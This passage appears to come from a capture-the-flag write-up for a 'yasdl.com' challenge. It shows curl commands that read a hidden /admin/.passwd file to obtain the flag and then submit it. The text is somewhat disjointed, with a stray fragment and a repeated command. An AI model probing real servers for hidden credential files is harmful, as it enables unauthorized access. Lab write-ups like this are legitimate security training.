$ curl -X POST -d "flag=YASDLp4ssw0rd_1s_h3r3" http://yasdl.com/submit.php The server replies:
<!-- the password is stored in a hidden file --> That tells us to keep looking for a hidden file. We brute‑force for hidden files inside the admin directory: yasdl.com password
$ curl -s http://yasdl.com/admin/.passwd YASDLp4ssw0rd_1s_h3r3 That string follows the typical flag format for the CTF ( YASDL... ), so we have found the password/flag. Most CTF platforms provide a “submit” page. The challenge often includes a submission form at /submit.php : $ curl -X POST -d "flag=YASDLp4ssw0rd_1s_h3r3" http://yasdl